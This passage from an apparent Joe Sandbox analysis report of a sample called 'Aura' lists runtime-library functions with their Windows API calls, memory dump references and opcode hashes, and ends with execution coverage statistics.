                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29415C75D006198FDB10DFA4D844BDDB7B0FB8A724F14422AE81567392D778AD44CFA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,000BD895,?,00000000,-00000008), ref: 000BC082
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000C1E2A
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 000C1E31
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000C1E6B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 000C1E72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                                                                                                    • Opcode ID: 642adbb0c3d3a7162d6f8ca624db7dbdfbc77ac8b176c832010e8269c7d15082
                                                                                                                                                                                                                                                    • Instruction ID: 06c1d796e572fe5854dfdf6f46d3a6794d93cce9360cd291ba52623d74665ae4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 642adbb0c3d3a7162d6f8ca624db7dbdfbc77ac8b176c832010e8269c7d15082
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A218071604215AFAB20AFA98881EEFB7A9FF46364710852DFC19D7153DB31EC108BA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5acf86568a037ccf011fe49a70e6ddb8d14eae4f5c4496ff41da7f3f1ec7b55d
                                                                                                                                                                                                                                                    • Instruction ID: b7c5fe5756b61446110c56923377e192255cb59f92f627aa45f374b244f1b2bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5acf86568a037ccf011fe49a70e6ddb8d14eae4f5c4496ff41da7f3f1ec7b55d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21C071204205AFDB61AF75CC81DEE7BA8FF90364B104925F85997252EB30EC40C7A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 000C31C6
                                                                                                                                                                                                                                                      • Part of subcall function 000BC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,000BD895,?,00000000,-00000008), ref: 000BC082
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C31FE
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C321E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                                                                                                    • Opcode ID: 7bea113a25fc33cbd2f4d6a4784abdbc1abb50234fa4ddfe6a698bf25ccc5777
                                                                                                                                                                                                                                                    • Instruction ID: 1918f088a776cd08cbd4c260f27df8aa8afe5c9757c5964c1b37ff58ec32b9c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bea113a25fc33cbd2f4d6a4784abdbc1abb50234fa4ddfe6a698bf25ccc5777
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F711C0B1521115BFAB2127B55C8ADFF7A9CDF893947104029FA11A2102FFA5DF0086B1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 000AE899
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000AE8A3
                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 000AE8BA
                                                                                                                                                                                                                                                      • Part of subcall function 000AC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 000AC1F6
                                                                                                                                                                                                                                                      • Part of subcall function 000AC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 000AC210
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000AE914
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1383202999-0
                                                                                                                                                                                                                                                    • Opcode ID: 07194d9eed04fb569cfb4d758b99fe821fff6af2316a47d42ac00c37e78cbde4
                                                                                                                                                                                                                                                    • Instruction ID: 4620cd3472b559e1cb409ae324a96ebeed7eaac5efa6adce3e42e9d1932fa890
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07194d9eed04fb569cfb4d758b99fe821fff6af2316a47d42ac00c37e78cbde4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711E13190425A9BDF05EBE4C955AFEB7B1AF86710F250109E811AB2D3CF389E00CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000), ref: 000CADB7
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000,?,?,?,000C3CD6,00000000), ref: 000CADC3
                                                                                                                                                                                                                                                      • Part of subcall function 000CAE20: CloseHandle.KERNEL32(FFFFFFFE,000CADD3,?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000,?,?), ref: 000CAE30
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 000CADD3
                                                                                                                                                                                                                                                      • Part of subcall function 000CADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000CAD91,000CA2DC,?,?,000C4390,?,00000000,00000000,?), ref: 000CAE08
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000,?), ref: 000CADE8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: 90c229bbcf8733a3d36c69a1929a95eced0df11a1d5a03f40da9f4b34802b90a
                                                                                                                                                                                                                                                    • Instruction ID: 4c1dff9687642fa186bdfcedae9589db789ced5a05b13fd953782eaf9768c51f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90c229bbcf8733a3d36c69a1929a95eced0df11a1d5a03f40da9f4b34802b90a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF01236601119BFDF621FD5DC04E9E3F66FF05761B004016FD0A86120D7328860DBA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 000B0507
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000B0516
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 000B051F
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 000B052C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: 169e4188da9a812297cc4573d50425e379ad34102085b02b150002bf25d83786
                                                                                                                                                                                                                                                    • Instruction ID: 3259bbfe53ca4b0102dde8ebe10b38b9d2cfd5add93ec5b7a8e1bef8f330e646
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 169e4188da9a812297cc4573d50425e379ad34102085b02b150002bf25d83786
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F06274D1120DEBDB00DFB4DA4999EBBF4FF1C200B914996E812E7110EB34AB449B60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,000BB893,?,?,00000000,00000000,00000000,?), ref: 000BB9B7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 910cd76bba0d43fccc06046f36aeaf0e2a9ea813cea3d07d44a33ec9b3dfff56
                                                                                                                                                                                                                                                    • Instruction ID: 2a4958504dee2c7324615b71e031e606da142762681f39d562d2063f375a4f5e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 910cd76bba0d43fccc06046f36aeaf0e2a9ea813cea3d07d44a33ec9b3dfff56
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B416A72D00209AFCF15DF98CC81AEEBBB5FF48300F188159FA14A7222D7B5AA50DB51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 000BB475
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: ab6db2bf257d2ddae185e4ea529b6d11ed89d09c71a9427993671abe2bb095e4
                                                                                                                                                                                                                                                    • Instruction ID: 32db476a2875d06eca596df6d8165014d2fdc62051e6ab3c4a02cdf518258495
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab6db2bf257d2ddae185e4ea529b6d11ed89d09c71a9427993671abe2bb095e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B312872500619EBCF369F51CC44AEE7BA6FF09314B18425AFC4509222C3B2DDA1DB82
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000AB8B9
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?), ref: 000AB8DE
                                                                                                                                                                                                                                                      • Part of subcall function 000B060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,000AF354,02774448,?,?,?,000AF354,000A3D4A,000D759C,000A3D4A), ref: 000B066D
                                                                                                                                                                                                                                                      • Part of subcall function 000B8353: IsProcessorFeaturePresent.KERNEL32(00000017,000BC224), ref: 000B836F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: dced23e9a8c8811c0835678a740142896f1d0e314d6012edfe2d976d32c588d7
                                                                                                                                                                                                                                                    • Instruction ID: 9eb86b20191dc81ca713404af6b8f213245dc5851be4ed8dc687935efbcb1d12
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dced23e9a8c8811c0835678a740142896f1d0e314d6012edfe2d976d32c588d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C217F31D00218EBCF24DFE9D945AEEB7F9AF46710F140419E405AB252DF78AD45CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 000A2673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: e7b4e7abb7a14d1eb367a89dd28694bb9b1d1fa4cf78c53858d8cf5fe3f389d9
                                                                                                                                                                                                                                                    • Instruction ID: 1effca588bd40bf0f953c1500be06014ccfa8e2bdbd728ff2963737d3399ba99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7b4e7abb7a14d1eb367a89dd28694bb9b1d1fa4cf78c53858d8cf5fe3f389d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2801DFF1604301ABDB14DF28E846B9B7BE4AF48318F11882EF45D8B342E379E804CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000B060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,000AF354,02774448,?,?,?,000AF354,000A3D4A,000D759C,000A3D4A), ref: 000B066D
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 000A2673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 65d57686d128235402c79e0c85432fbb2a84e4408dbce544f9a9496bede979f2
                                                                                                                                                                                                                                                    • Instruction ID: 2c14f4dc526ba58c8998745f3561ce0b161d6508d7557cb609d11011a019354a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65d57686d128235402c79e0c85432fbb2a84e4408dbce544f9a9496bede979f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F0F8F1514300ABE700AF18EC45B8BBBE4EB54718F11882EF9989B301E3B9D444CF92

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:5%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:6.4%
                                                                                                                                                                                                                                                    Signature Coverage:36.8%
                                                                                                                                                                                                                                                    Total number of Nodes:250
                                                                                                                                                                                                                                                    Total number of Limit Nodes:25
